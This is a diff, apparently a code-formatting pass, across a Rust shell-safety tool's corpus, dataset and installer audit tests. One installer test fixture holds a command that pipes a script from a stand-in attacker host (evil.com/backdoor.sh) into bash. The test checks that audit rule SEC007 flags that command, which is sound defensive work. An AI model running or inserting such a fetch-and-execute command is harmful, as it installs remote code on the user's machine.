+            "Should have at least 6 contract checks"
+        );
         assert!(report.passed_count > 0);
     }
 
@@ -253,7 +265,14 @@ mod tests {
     fn test_dataset_split_proportions() {
         let result = check_dataset_split();
         // Split proportions should be roughly 80/10/10
-        assert!(result.passed, "Split proportions should be valid: {}", result.detail);
-        assert!(result.value >= 70.0 && result.value <= 90.0, "Train pct should be ~80%");
+        assert!(
+            result.passed,
+            "Split proportions should be valid: {}",
+            result.detail
+        );
+        assert!(
+            result.value >= 70.0 && result.value <= 90.0,
+            "Train pct should be ~80%"
+        );
     }
 }

--- a/rash/src/corpus/conversations.rs
+++ b/rash/src/corpus/conversations.rs
@@ -90,14 +90,10 @@ pub fn generate_conversation(input: &ConversationInput<'_>, seed: u64) -> Conver
     let variant = (seed % 10) as usize;
 
     let turns = match conv_type {
-        ConversationType::ClassifyExplain => {
-            generate_classify_explain(input, variant)
-        }
+        ConversationType::ClassifyExplain => generate_classify_explain(input, variant),
         ConversationType::Fix => generate_fix(input, variant),
         ConversationType::Debug => generate_debug(input, variant),
-        ConversationType::ConfirmSafe => {
-            generate_confirm_safe(input, variant)
-        }
+        ConversationType::ConfirmSafe => generate_confirm_safe(input, variant),
     };
 
     Conversation {
@@ -120,9 +116,7 @@ pub fn generate_batch(
         let diagnostics = &result.diagnostics;
 
         let has_security = diagnostics.iter().any(|d| d.code.starts_with("SEC"));
-        let has_determinism = diagnostics
-            .iter()
-            .any(|d| d.code.starts_with("DET"));
+        let has_determinism = diagnostics.iter().any(|d| d.code.starts_with("DET"));
 
         let is_safe = !has_security && !has_determinism && diagnostics.is_empty();
 
@@ -181,10 +175,7 @@ fn select_type(input: &ConversationInput<'_>, seed: u64) -> ConversationType {
         return ConversationType::Debug;
     }
 
-    let has_security = input
-        .diagnostics
-        .iter()
-        .any(|d| d.code.starts_with("SEC"));
+    let has_security = input.diagnostics.iter().any(|d| d.code.starts_with("SEC"));
 
     // Alternate between ClassifyExplain and Fix for unsafe scripts
     if has_security && seed.is_multiple_of(2) {
@@ -279,9 +270,8 @@ fn generate_classify_explain(input: &ConversationInput<'_>, variant: usize) -> V
         response.push_str("- General safety concerns detected in this script.\n");
     }
 
-    response.push_str(
-        "\nI recommend fixing these issues before running this script in production.",
-    );
+    response
+        .push_str("\nI recommend fixing these issues before running this script in production.");
 
     vec![
         Turn {
@@ -338,8 +328,7 @@ fn generate_debug(input: &ConversationInput<'_>, variant: usize) -> Vec<Turn> {
         .filter(|d| d.code.starts_with("DET"))
         .collect();
 
-    let mut response =
-        String::from("This script contains non-deterministic patterns:\n\n");
+    let mut response = String::from("This script contains non-deterministic patterns:\n\n");
 
     for d in &det_findings {
         let _ = writeln!(
@@ -350,8 +339,7 @@ fn generate_debug(input: &ConversationInput<'_>, variant: usize) -> Vec<Turn> {
     }
 
     if det_findings.is_empty() {
-        response
-            .push_str("- Non-deterministic behavior detected in the script.\n");
+        response.push_str("- Non-deterministic behavior detected in the script.\n");
     }
 
     response.push_str(
@@ -394,9 +382,8 @@ fn generate_confirm_safe(input: &ConversationInput<'_>, variant: usize) -> Vec<T
     let opening_idx = variant % openings.len();
     let mut response = String::from(openings[opening_idx]);
     response.push_str(" It doesn't contain known unsafe patterns like ");
-    response.push_str(
-        "command injection, non-deterministic operations, or non-idempotent commands.",
-    );
+    response
+        .push_str("command injection, non-deterministic operations, or non-idempotent commands.");
 
     vec![
         Turn {
@@ -456,12 +443,7 @@ fn check_variant_distribution(conversations: &[Conversation]) -> bool {
     for conv in conversations {
         if let Some(user_turn) = conv.turns.first() {
             // Extract first line as variant key
-            let key = user_turn
-                .content
-                .lines()
-                .next()
-                .unwrap_or("")
-                .to_string();
+            let key = user_turn.content.lines().next().unwrap_or("").to_string();
             *variant_counts.entry(key).or_insert(0usize) += 1;
         }
     }
@@ -585,7 +567,10 @@ mod tests {
 
     #[test]
     fn test_conversation_type_labels() {
-        assert_eq!(ConversationType::ClassifyExplain.label(), "classify-explain");
+        assert_eq!(
+            ConversationType::ClassifyExplain.label(),
+            "classify-explain"
+        );
         assert_eq!(ConversationType::Fix.label(), "fix");
         assert_eq!(ConversationType::Debug.label(), "debug");
         assert_eq!(ConversationType::ConfirmSafe.label(), "confirm-safe");
@@ -606,8 +591,7 @@ mod tests {
         assert!(!jsonl.is_empty());
         assert!(jsonl.ends_with('\n'));
         // Should be valid JSON
-        let parsed: serde_json::Value =
-            serde_json::from_str(jsonl.trim()).expect("valid JSON");
+        let parsed: serde_json::Value = serde_json::from_str(jsonl.trim()).expect("valid JSON");
         assert_eq!(parsed["conversation_type"], "ConfirmSafe");
     }
 
@@ -644,7 +628,10 @@ mod tests {
 
         let (convs, _) = generate_batch(&entries, 0);
         let ok = check_variant_distribution(&convs);
-        assert!(ok, "Variant distribution should be diverse with 12+ prompts");
+        assert!(
+            ok,
+            "Variant distribution should be diverse with 12+ prompts"
+        );
     }
 
     #[test]

--- a/rash/src/corpus/corpus_format_tests.rs
+++ b/rash/src/corpus/corpus_format_tests.rs
@@ -578,9 +578,7 @@ fn test_format_schema_report_mixed_validity() {
 
 #[test]
 fn test_format_schema_report_empty_corpus() {
-    let registry = crate::corpus::registry::CorpusRegistry {
-        entries: vec![],
-    };
+    let registry = crate::corpus::registry::CorpusRegistry { entries: vec![] };
     let report = validate_corpus(&registry);
     let table = format_schema_report(&report);
 
@@ -691,7 +689,11 @@ fn test_schema_report_pass_rate_none_valid() {
 fn test_grammar_category_fix_pattern_all() {
     for cat in GrammarCategory::all() {
         let fix = cat.fix_pattern();
-        assert!(!fix.is_empty(), "fix_pattern for {:?} should not be empty", cat);
+        assert!(
+            !fix.is_empty(),
+            "fix_pattern for {:?} should not be empty",
+            cat
+        );
     }
 }
 
@@ -699,7 +701,11 @@ fn test_grammar_category_fix_pattern_all() {
 fn test_grammar_category_description_all() {
     for cat in GrammarCategory::all() {
         let desc = cat.description();
-        assert!(!desc.is_empty(), "description for {:?} should not be empty", cat);
+        assert!(
+            !desc.is_empty(),
+            "description for {:?} should not be empty",
+            cat
+        );
     }
 }
 
@@ -718,7 +724,10 @@ fn test_grammar_category_applicable_format_coverage() {
     }
 
     assert!(saw_bash, "At least one category should apply to Bash");
-    assert!(saw_makefile, "At least one category should apply to Makefile");
+    assert!(
+        saw_makefile,
+        "At least one category should apply to Makefile"
+    );
     assert!(
         saw_dockerfile,
         "At least one category should apply to Dockerfile"

--- a/rash/src/corpus/dataset.rs
+++ b/rash/src/corpus/dataset.rs
@@ -166,10 +166,21 @@ fn collect_export_stats(rows: &[ClassificationRow]) -> ExportStats {
         .map(|(i, _)| i as u8)
         .collect();
 
-    ExportStats { class_counts, class_total_len, present_classes, preamble_count, trivial_count }
+    ExportStats {
+        class_counts,
+        class_total_len,
+        present_classes,
+        preamble_count,
+        trivial_count,
+    }
 }
 
-fn check_missing_classes(stats: &ExportStats, expected: u8, num_present: usize, errors: &mut Vec<String>) {
+fn check_missing_classes(
+    stats: &ExportStats,
+    expected: u8,
+    num_present: usize,
+    errors: &mut Vec<String>,
+) {
     let missing: Vec<u8> = (0..expected)
         .filter(|i| stats.class_counts[*i as usize] == 0)
         .collect();
@@ -214,15 +225,23 @@ fn check_preamble_contamination(preamble_count: usize, total: usize, errors: &mu
     }
 }
 
-fn check_length_confound(stats: &ExportStats, errors: &mut Vec<String>, warnings: &mut Vec<String>) {
-    let avg_lens: Vec<f64> = stats.present_classes.iter().map(|&c| {
-        let idx = c as usize;
-        if stats.class_counts[idx] > 0 {
-            stats.class_total_len[idx] as f64 / stats.class_counts[idx] as f64
-        } else {
-            0.0
-        }
-    }).collect();
+fn check_length_confound(
+    stats: &ExportStats,
+    errors: &mut Vec<String>,
+    warnings: &mut Vec<String>,
+) {
+    let avg_lens: Vec<f64> = stats
+        .present_classes
+        .iter()
+        .map(|&c| {
+            let idx = c as usize;
+            if stats.class_counts[idx] > 0 {
+                stats.class_total_len[idx] as f64 / stats.class_counts[idx] as f64
+            } else {
+                0.0
+            }
+        })
+        .collect();
 
     if avg_lens.len() < 2 {
         return;
@@ -248,8 +267,16 @@ fn check_length_confound(stats: &ExportStats, errors: &mut Vec<String>, warnings
 
 impl std::fmt::Display for ExportValidation {
     fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
-        writeln!(f, "Export Validation: {}", if self.passed { "PASS" } else { "FAIL" })?;
-        writeln!(f, "  Total: {} samples, {} classes", self.total, self.num_classes)?;
+        writeln!(
+            f,
+            "Export Validation: {}",
+            if self.passed { "PASS" } else { "FAIL" }
+        )?;
+        writeln!(
+            f,
+            "  Total: {} samples, {} classes",
+            self.total, self.num_classes
+        )?;
         for (i, &count) in self.class_counts.iter().enumerate() {
             if count > 0 {
                 let pct = 100.0 * count as f64 / self.total as f64;
@@ -305,10 +332,7 @@ pub struct SplitResult {
 ///
 /// This is the canonical split function. All export paths must use it
 /// to prevent train/test leakage and ensure reproducibility.
-pub fn split_and_validate(
-    rows: Vec<ClassificationRow>,
-    expected_classes: u8,
-) -> SplitResult {
+pub fn split_and_validate(rows: Vec<ClassificationRow>, expected_classes: u8) -> SplitResult {
     // Hash-based assignment: stable across corpus growth
     let mut train = Vec::new();
     let mut val = Vec::new();
@@ -324,9 +348,7 @@ pub fn split_and_validate(
     }
 
     // Validate overall + per-split
-    let mut all: Vec<ClassificationRow> = Vec::with_capacity(
-        train.len() + val.len() + test.len(),
-    );
+    let mut all: Vec<ClassificationRow> = Vec::with_capacity(train.len() + val.len() + test.len());
     all.extend(train.iter().cloned());
     all.extend(val.iter().cloned());
     all.extend(test.iter().cloned());
@@ -380,10 +402,14 @@ impl fmt::Display for SplitResult {
         writeln!(f, "Split Result ({total} total):")?;
         for (name, split, sv) in [
             ("train", &self.train, &self.split_validations[0]),
-            ("val",   &self.val,   &self.split_validations[1]),
-            ("test",  &self.test,  &self.split_validations[2]),
+            ("val", &self.val, &self.split_validations[1]),
+            ("test", &self.test, &self.split_validations[2]),
         ] {
-            let pct = if total > 0 { 100.0 * split.len() as f64 / total as f64 } else { 0.0 };
+            let pct = if total > 0 {
+                100.0 * split.len() as f64 / total as f64
+            } else {
+                0.0
+            };
             let status = if sv.passed { "PASS" } else { "FAIL" };
             write!(f, "  {name}: {:>6} ({pct:5.1}%) [{status}]", split.len())?;
             // Show per-class counts inline
@@ -442,11 +468,8 @@ pub fn build_dataset(registry: &CorpusRegistry, score: &CorpusScore) -> Vec<Data
 
     // KAIZEN-069: O(1) HashMap lookup instead of O(n) linear find per entry.
     // With 17,942 entries, the old O(n²) find wasted ~161M string comparisons.
-    let results_by_id: HashMap<&str, &CorpusResult> = score
-        .results
-        .iter()
-        .map(|r| (r.id.as_str(), r))
-        .collect();
+    let results_by_id: HashMap<&str, &CorpusResult> =
+        score.results.iter().map(|r| (r.id.as_str(), r)).collect();
 
     registry
         .entries
@@ -719,7 +742,11 @@ pub fn classify_single(
     lint_clean: bool,
     deterministic: bool,
 ) -> ClassificationRow {
-    let label = if transpiled && lint_clean && deterministic { 0 } else { 1 };
+    let label = if transpiled && lint_clean && deterministic {
+        0
+    } else {
+        1
+    };
     ClassificationRow {
         input: strip_shell_preamble(original_input),
         label,
@@ -1627,7 +1654,10 @@ mod tests {
         let row = build_row(&entry, Some(&result), "6.61.0", "abc1234", "2026-02-09");
 
         let output = export_classification_jsonl(&[row]);
-        assert!(!output.is_empty(), "Failed entries should be included as unsafe (label 1)");
+        assert!(
+            !output.is_empty(),
+            "Failed entries should be included as unsafe (label 1)"
+        );
         let parsed: serde_json::Value = serde_json::from_str(&output).expect("valid JSON");
         assert_eq!(parsed.get("label").and_then(|v| v.as_u64()), Some(1));
     }
@@ -1646,7 +1676,11 @@ mod tests {
 
         let output = export_classification_jsonl(&rows);
         let lines: Vec<&str> = output.lines().collect();
-        assert_eq!(lines.len(), 3, "All entries included (binary: safe=0, unsafe=1)");
+        assert_eq!(
+            lines.len(),
+            3,
+            "All entries included (binary: safe=0, unsafe=1)"
+        );
     }
 
     #[test]

--- a/rash/src/corpus/domain_categories_tests.rs
+++ b/rash/src/corpus/domain_categories_tests.rs
@@ -61,7 +61,10 @@ fn test_label_unix_tools() {
 
 #[test]
 fn test_label_lang_integration() {
-    assert_eq!(DomainCategory::LangIntegration.label(), "E: Lang Integration");
+    assert_eq!(
+        DomainCategory::LangIntegration.label(),
+        "E: Lang Integration"
+    );
 }
 
 #[test]
@@ -183,7 +186,7 @@ fn test_format_categories_report_single_domain_category() {
     assert!(report.contains("D: Unix Tools"));
     assert!(report.contains("80%")); // fill_pct = 80%
     assert!(report.contains("87.5%")); // pass_rate = 7/8 = 87.5%
-    // No General row should appear
+                                       // No General row should appear
     assert!(!report.contains("General"));
     // Summary
     assert!(report.contains("Total: 8 entries (8 domain-specific"));

--- a/rash/src/corpus/evaluation.rs
+++ b/rash/src/corpus/evaluation.rs
@@ -8,9 +8,9 @@ use serde::Serialize;
 /// Confusion matrix for binary classification.
 #[derive(Debug, Clone, Default, Serialize)]
 pub struct ConfusionMatrix {
-    pub tp: usize, // true positive (predicted unsafe, actually unsafe)
-    pub fp: usize, // false positive (predicted unsafe, actually safe)
-    pub tn: usize, // true negative (predicted safe, actually safe)
+    pub tp: usize,  // true positive (predicted unsafe, actually unsafe)
+    pub fp: usize,  // false positive (predicted unsafe, actually safe)
+    pub tn: usize,  // true negative (predicted safe, actually safe)
     pub fn_: usize, // false negative (predicted safe, actually unsafe)
 }
 
@@ -136,11 +136,7 @@ pub fn format_report(report: &EvaluationReport) -> String {
     );
     let _ = writeln!(out, "  Accuracy:   {:.3} (target: >0.935)", report.accuracy);
     let _ = writeln!(out, "  Precision:  {:.3}", report.precision);
-    let _ = writeln!(
-        out,
-        "  Recall:     {:.3} (target: >=0.60)",
-        report.recall
-    );
+    let _ = writeln!(out, "  Recall:     {:.3} (target: >=0.60)", report.recall);
     let _ = writeln!(out, "  F1:         {:.3}", report.f1);
     let _ = writeln!(
         out,

--- a/rash/src/corpus/generalization_tests.rs
+++ b/rash/src/corpus/generalization_tests.rs
@@ -405,7 +405,11 @@ mod tests {
     #[test]
     fn test_exactly_50_generalization_tests() {
         let tests = generalization_tests();
-        assert_eq!(tests.len(), 50, "SSC v11 Section 5.6 requires exactly 50 tests");
+        assert_eq!(
+            tests.len(),
+            50,
+            "SSC v11 Section 5.6 requires exactly 50 tests"
+        );
     }
 
     #[test]
@@ -434,7 +438,10 @@ mod tests {
         let tests = generalization_tests();
         let summary = category_summary(&tests);
         let categories: Vec<&str> = summary.iter().map(|(c, _)| *c).collect();
-        assert!(categories.contains(&"injection"), "Must have injection tests");
+        assert!(
+            categories.contains(&"injection"),
+            "Must have injection tests"
+        );
         assert!(
             categories.contains(&"non-determinism"),
             "Must have non-determinism tests"
@@ -443,7 +450,10 @@ mod tests {
             categories.contains(&"race-condition"),
             "Must have race-condition tests"
         );
-        assert!(categories.contains(&"privilege"), "Must have privilege tests");
+        assert!(
+            categories.contains(&"privilege"),
+            "Must have privilege tests"
+        );
         assert!(
             categories.contains(&"exfiltration"),
             "Must have exfiltration tests"

--- a/rash/src/corpus/mod.rs
+++ b/rash/src/corpus/mod.rs
@@ -25,21 +25,18 @@ pub mod adversarial_templates;
 pub mod baselines;
 pub mod citl;
 pub mod contract_validation;
-pub mod conversations;
-#[allow(clippy::expect_used)] // Report generation uses expect() for internal formatting
-pub mod ssc_report;
 pub mod convergence;
-pub mod evaluation;
-pub mod generalization_tests;
-pub mod label_audit;
-pub mod tokenizer_validation;
+pub mod conversations;
 #[allow(clippy::expect_used)] // Dataset uses expect() for internal invariants
 pub mod dataset;
 #[allow(clippy::expect_used)] // Domain categories uses expect() for internal invariants
 pub mod domain_categories;
 #[allow(clippy::expect_used)] // Error dedup uses expect() for internal invariants
 pub mod error_dedup;
+pub mod evaluation;
+pub mod generalization_tests;
 pub mod graph_priority;
+pub mod label_audit;
 pub mod oip;
 pub mod pattern_store;
 #[allow(clippy::expect_used)] // Quality gates uses expect() for internal invariants
@@ -48,7 +45,10 @@ pub mod registry;
 #[allow(clippy::expect_used)] // Runner uses expect() for internal invariants
 pub mod runner;
 pub mod schema_enforcement;
+#[allow(clippy::expect_used)] // Report generation uses expect() for internal formatting
+pub mod ssc_report;
 pub mod tier_analysis;
+pub mod tokenizer_validation;
 
 #[cfg(test)]
 #[path = "registry_coverage_tests.rs"]

--- a/rash/src/corpus/runner.rs
+++ b/rash/src/corpus/runner.rs
@@ -662,10 +662,7 @@ impl CorpusRunner {
 
         // For small entry counts or single-thread systems, skip thread overhead
         if entries.len() < n_threads * 2 || n_threads <= 1 {
-            return entries
-                .iter()
-                .map(|e| self.run_entry(e))
-                .collect();
+            return entries.iter().map(|e| self.run_entry(e)).collect();
         }
 
         let chunk_size = (entries.len() + n_threads - 1) / n_threads;
@@ -675,12 +672,7 @@ impl CorpusRunner {
             let handles: Vec<_> = chunks
                 .into_iter()
                 .map(|chunk| {
-                    s.spawn(move || {
-                        chunk
-                            .iter()
-                            .map(|e| self.run_entry(e))
-                            .collect::<Vec<_>>()
-                    })
+                    s.spawn(move || chunk.iter().map(|e| self.run_entry(e)).collect::<Vec<_>>())
                 })
                 .collect();
 
@@ -785,9 +777,7 @@ impl CorpusRunner {
         let transpile_result = match entry.format {
             CorpusFormat::Bash => crate::transpile(&entry.input, &self.config),
             CorpusFormat::Makefile => crate::transpile_makefile(&entry.input, &self.config),
-            CorpusFormat::Dockerfile => {
-                crate::transpile_dockerfile(&entry.input, &self.config)
-            }
+            CorpusFormat::Dockerfile => crate::transpile_dockerfile(&entry.input, &self.config),
         };
 
         match transpile_result {
@@ -1379,9 +1369,7 @@ impl CorpusRunner {
         let second = match entry.format {
             CorpusFormat::Bash => crate::transpile(&entry.input, &self.config),
             CorpusFormat::Makefile => crate::transpile_makefile(&entry.input, &self.config),
-            CorpusFormat::Dockerfile => {
-                crate::transpile_dockerfile(&entry.input, &self.config)
-            }
+            CorpusFormat::Dockerfile => crate::transpile_dockerfile(&entry.input, &self.config),
         };
 
         match second {
@@ -2901,7 +2889,10 @@ end_of_record
         );
         // When transpilation fails, metamorphic_consistent is false (Err branch)
         let result = runner.run_entry(&entry);
-        assert!(!result.transpiled, "Invalid input should fail transpilation");
+        assert!(
+            !result.transpiled,
+            "Invalid input should fail transpilation"
+        );
         assert!(
             !result.metamorphic_consistent,
             "Failed transpilation sets metamorphic_consistent=false"
@@ -2968,7 +2959,10 @@ end_of_record
         );
         // When transpilation fails, run_entry sets deterministic=false in Err branch
         let result = runner.run_entry(&entry);
-        assert!(!result.transpiled, "Invalid input should fail transpilation");
+        assert!(
+            !result.transpiled,
+            "Invalid input should fail transpilation"
+        );
         assert!(
             !result.deterministic,
             "Invalid input should fail determinism check"

--- a/rash/src/corpus/ssc_report.rs
+++ b/rash/src/corpus/ssc_report.rs
@@ -58,7 +58,9 @@ pub fn generate_ssc_report() -> SscStatusReport {
 
     SscStatusReport {
         spec_version: "v11.0.0".to_string(),
-        corpus_size: crate::corpus::registry::CorpusRegistry::load_full().entries.len(),
+        corpus_size: crate::corpus::registry::CorpusRegistry::load_full()
+            .entries
+            .len(),
         sections,
         overall_ready,
     }
@@ -247,14 +249,12 @@ fn generalization_section() -> SscSection {
         } else {
             SscStatus::Fail
         },
-        metrics: vec![
-            SscMetric {
-                name: "Caught".to_string(),
-                value: format!("{caught}/{total} ({pct:.1}%)"),
-                target: format!(">={GENERALIZATION_TARGET_PCT}%"),
-                passed,
-            },
-        ],
+        metrics: vec![SscMetric {
+            name: "Caught".to_string(),
+            value: format!("{caught}/{total} ({pct:.1}%)"),
+            target: format!(">={GENERALIZATION_TARGET_PCT}%"),
+            passed,
+        }],
     }
 }
 
@@ -371,11 +371,7 @@ pub fn format_ssc_report(report: &SscStatusReport) -> String {
             SscStatus::Fail => "FAIL",
             SscStatus::NotApplicable => "N/A",
         };
-        let _ = writeln!(
-            out,
-            "[{status}] {} ({})",
-            section.name, section.spec_ref
-        );
+        let _ = writeln!(out, "[{status}] {} ({})", section.name, section.spec_ref);
         for m in &section.metrics {
             let check = if m.passed { "+" } else { "-" };
             let _ = writeln!(

--- a/rash/src/corpus/tier_analysis_coverage_tests.rs
+++ b/rash/src/corpus/tier_analysis_coverage_tests.rs
@@ -124,13 +124,7 @@ fn test_tier_targets_empty_tiers() {
 #[test]
 fn test_tier_targets_single_tier() {
     let analysis = TierWeightedScore {
-        tiers: vec![make_tier_stats(
-            CorpusTier::Trivial,
-            50,
-            50,
-            1.0,
-            0.99,
-        )],
+        tiers: vec![make_tier_stats(CorpusTier::Trivial, 50, 50, 1.0, 0.99)],
         weighted_score: 100.0,
         unweighted_score: 100.0,
         weight_delta: 0.0,
@@ -197,7 +191,10 @@ fn test_tier_targets_format_contains_table() {
     let result = format_tier_targets(&analysis);
     // Should contain table-like formatting
     assert!(
-        result.contains("│") || result.contains("|") || result.contains("─") || result.lines().count() > 3,
+        result.contains("│")
+            || result.contains("|")
+            || result.contains("─")
+            || result.lines().count() > 3,
         "Should contain table structure"
     );
 }

--- a/rash/src/corpus/tokenizer_validation.rs
+++ b/rash/src/corpus/tokenizer_validation.rs
@@ -195,10 +195,7 @@ pub fn shell_constructs() -> Vec<TokenizerTestCase> {
 /// Token comparison is flexible: we check if the token sequence preserves
 /// meaningful boundaries (e.g., `$RANDOM` stays as one or two tokens,
 /// not fragmented into `$` + `RAN` + `DOM`).
-pub fn validate_tokenization(
-    test: &TokenizerTestCase,
-    tokens: &[String],
-) -> TokenizerTestResult {
+pub fn validate_tokenization(test: &TokenizerTestCase, tokens: &[String]) -> TokenizerTestResult {
     let token_str = tokens.join(" + ");
 
     // Check if any unacceptable pattern matches
@@ -246,9 +243,7 @@ pub fn validate_tokenization(
         reason: if acceptable {
             format!("{token_count} tokens for {logical_units} logical units: acceptable")
         } else {
-            format!(
-                "{token_count} tokens for {logical_units} logical units: too fragmented"
-            )
+            format!("{token_count} tokens for {logical_units} logical units: too fragmented")
         },
     }
 }
@@ -327,9 +322,7 @@ mod tests {
     #[test]
     fn test_validation_with_bad_tokenizer() {
         // Simulate a terrible tokenizer that splits every character
-        let report = run_validation(|construct| {
-            construct.chars().map(|c| c.to_string()).collect()
-        });
+        let report = run_validation(|construct| construct.chars().map(|c| c.to_string()).collect());
 
         // Character-level tokenization is too fragmented
         assert!(
@@ -342,7 +335,7 @@ mod tests {
     #[test]
     fn test_validate_single_construct() {
         let test = &shell_constructs()[0]; // $(command)
-        // Good tokenization
+                                           // Good tokenization
         let good_tokens = vec!["$(".to_string(), "command".to_string(), ")".to_string()];
         let result = validate_tokenization(test, &good_tokens);
         assert!(result.acceptable, "Should accept 3-token split");

--- a/rash/src/coverage_integration_tests.rs
+++ b/rash/src/coverage_integration_tests.rs
@@ -650,7 +650,9 @@ mod purification_integration {
         // Should have at least one determinism fix
         let total_fixes = report.determinism_fixes.len() + report.warnings.len();
         assert!(
-            total_fixes > 0 || !report.idempotency_fixes.is_empty() || purified.statements.len() == 1,
+            total_fixes > 0
+                || !report.idempotency_fixes.is_empty()
+                || purified.statements.len() == 1,
             "Expected purification activity for $RANDOM"
         );
     }

--- a/rash/src/emitter/makefile_coverage_tests2.rs
+++ b/rash/src/emitter/makefile_coverage_tests2.rs
@@ -44,7 +44,10 @@ fn test_MCOV2_001_line_with_hash_name_not_target() {
     })]);
     let result = emit_makefile(&ast).unwrap();
     // Should not create a target named "#comment"
-    assert!(!result.contains("#comment:") || result.contains("#comment"), "Result: {result}");
+    assert!(
+        !result.contains("#comment:") || result.contains("#comment"),
+        "Result: {result}"
+    );
 }
 
 #[test]
@@ -94,7 +97,10 @@ fn test_MCOV2_005_simple_assignment_empty_name_not_var() {
     })]);
     let result = emit_makefile(&ast).unwrap();
     // Empty name before := should not produce a variable
-    assert!(result.contains(":=") || result.contains("value"), "Result: {result}");
+    assert!(
+        result.contains(":=") || result.contains("value"),
+        "Result: {result}"
+    );
 }
 
 #[test]
@@ -107,10 +113,7 @@ fn test_MCOV2_006_simple_assignment_space_in_name_not_var() {
         ))],
     })]);
     let result = emit_makefile(&ast).unwrap();
-    assert!(
-        result.contains("multi word"),
-        "Result: {result}"
-    );
+    assert!(result.contains("multi word"), "Result: {result}");
 }
 
 #[test]
@@ -118,9 +121,7 @@ fn test_MCOV2_007_target_name_with_space_not_target() {
     // "multi word: deps" has space in target name → not a target
     let ast = make_ast(vec![Stmt::Expr(Expr::FunctionCall {
         name: "exec".to_string(),
-        args: vec![Expr::Literal(Literal::Str(
-            "multi word: deps".to_string(),
-        ))],
+        args: vec![Expr::Literal(Literal::Str("multi word: deps".to_string()))],
     })]);
     let result = emit_makefile(&ast).unwrap();
     // Should not create a proper target (treated as comment or skipped)
@@ -179,7 +180,10 @@ fn test_MCOV2_009_mixed_output_types_raw_mode() {
     ]);
     let result = emit_makefile(&ast).unwrap();
     // Should resolve the variable and produce output
-    assert!(result.contains("gcc") || result.contains("no newline") || result.contains("LDFLAGS"), "Result: {result}");
+    assert!(
+        result.contains("gcc") || result.contains("no newline") || result.contains("LDFLAGS"),
+        "Result: {result}"
+    );
 }
 
 // ---------------------------------------------------------------------------
@@ -236,7 +240,10 @@ fn test_MCOV2_012_target_empty_name_not_created() {
     })]);
     let result = emit_makefile(&ast).unwrap();
     // Empty name target should not be created
-    assert!(result.contains(": deps") || !result.is_empty(), "Result: {result}");
+    assert!(
+        result.contains(": deps") || !result.is_empty(),
+        "Result: {result}"
+    );
 }
 
 // ---------------------------------------------------------------------------
@@ -290,9 +297,7 @@ fn test_MCOV2_015_phony_target_3_args() {
         args: vec![
             Expr::Literal(Literal::Str("test".to_string())),
             Expr::Array(vec![Expr::Literal(Literal::Str("build".to_string()))]),
-            Expr::Array(vec![Expr::Literal(Literal::Str(
-                "cargo test".to_string(),
-            ))]),
+            Expr::Array(vec![Expr::Literal(Literal::Str("cargo test".to_string()))]),
         ],
     })]);
     let result = emit_makefile(&ast).unwrap();
@@ -392,7 +397,10 @@ fn test_MCOV2_019_non_main_fn_echo_non_string_arg() {
     };
     let result = emit_makefile(&ast).unwrap();
     // echo with non-string arg: first arg is not Literal::Str → no recipe added
-    assert!(!result.contains("report:") || result.contains("report"), "Result: {result}");
+    assert!(
+        !result.contains("report:") || result.contains("report"),
+        "Result: {result}"
+    );
 }
 
 // ---------------------------------------------------------------------------

--- a/rash/src/installer/executor_cov_tests.rs
+++ b/rash/src/installer/executor_cov_tests.rs
@@ -412,7 +412,8 @@ fn test_EXCOV_016_apt_install_dry_run_with_sudo() {
 #[test]
 fn test_EXCOV_017_user_group_real() {
     let executor = StepExecutor::new();
-    let result = executor.execute_user_group("ug-test", "nonexistent_user_xyz", "nonexistent_group_xyz");
+    let result =
+        executor.execute_user_group("ug-test", "nonexistent_user_xyz", "nonexistent_group_xyz");
     // Will fail due to invalid user/group but tests the non-dry-run path
     assert!(result.is_ok(), "Should return Ok, not panic");
     let r = result.unwrap();

--- a/rash/src/installer/installer_tests.rs
+++ b/rash/src/installer/installer_tests.rs
@@ -10,9 +10,7 @@
 
 use std::path::PathBuf;
 
-use crate::installer::audit::{
-    AuditCategory, AuditContext, AuditReport, AuditSeverity,
-};
+use crate::installer::audit::{AuditCategory, AuditContext, AuditReport, AuditSeverity};
 use crate::installer::from_bash::convert_bash_to_installer;
 use crate::installer::spec::InstallerSpec;
 
@@ -34,8 +32,8 @@ fn audit_toml_with_context(toml: &str, ctx: AuditContext) -> AuditReport {
 /// Convert a bash script to installer TOML, parse it, and audit it.
 fn audit_bash_script(bash: &str, name: &str) -> AuditReport {
     let conversion = convert_bash_to_installer(bash, name).expect("Conversion should succeed");
-    let spec = InstallerSpec::parse(&conversion.installer_toml)
-        .expect("Converted TOML should be valid");
+    let spec =
+        InstallerSpec::parse(&conversion.installer_toml).expect("Converted TOML should be valid");
     let ctx = AuditContext::new();
     ctx.audit_parsed_spec(&spec, &PathBuf::from("/test/installer.toml"))
 }
@@ -113,7 +111,10 @@ sha256 = "abc123"
     );
 
     let herm002 = report.findings.iter().find(|f| f.rule_id == "HERM002");
-    assert!(herm002.is_some(), "HERM002 should trigger for 'latest' in URL");
+    assert!(
+        herm002.is_some(),
+        "HERM002 should trigger for 'latest' in URL"
+    );
     assert_eq!(herm002.unwrap().severity, AuditSeverity::Warning);
     assert!(herm002.unwrap().description.contains("app"));
 }
@@ -360,7 +361,10 @@ content = "curl https://evil.com/backdoor.sh | bash"
     );
 
     let sec007 = report.findings.iter().find(|f| f.rule_id == "SEC007");
-    assert!(sec007.is_some(), "SEC007 should trigger for curl | bash pattern");
+    assert!(
+        sec007.is_some(),
+        "SEC007 should trigger for curl | bash pattern"
+    );
     assert_eq!(sec007.unwrap().severity, AuditSeverity::Critical);
 }
 
@@ -418,7 +422,10 @@ content = "echo second"
     );
 
     let qual004 = report.findings.iter().find(|f| f.rule_id == "QUAL004");
-    assert!(qual004.is_some(), "QUAL004 should trigger for duplicate step IDs");
+    assert!(
+        qual004.is_some(),
+        "QUAL004 should trigger for duplicate step IDs"
+    );
     assert_eq!(qual004.unwrap().severity, AuditSeverity::Error);
 }
 
@@ -442,7 +449,10 @@ content = "echo hello"
     );
 
     let qual005 = report.findings.iter().find(|f| f.rule_id == "QUAL005");
-    assert!(qual005.is_some(), "QUAL005 should trigger for invalid dependency");
+    assert!(
+        qual005.is_some(),
+        "QUAL005 should trigger for invalid dependency"
+    );
     assert_eq!(qual005.unwrap().severity, AuditSeverity::Error);
     assert!(qual005.unwrap().description.contains("nonexistent-step"));
 }
@@ -513,7 +523,10 @@ content = """
     let report = audit_toml(&toml);
 
     let bp005 = report.findings.iter().find(|f| f.rule_id == "BP005");
-    assert!(bp005.is_some(), "BP005 should trigger for scripts over 50 lines");
+    assert!(
+        bp005.is_some(),
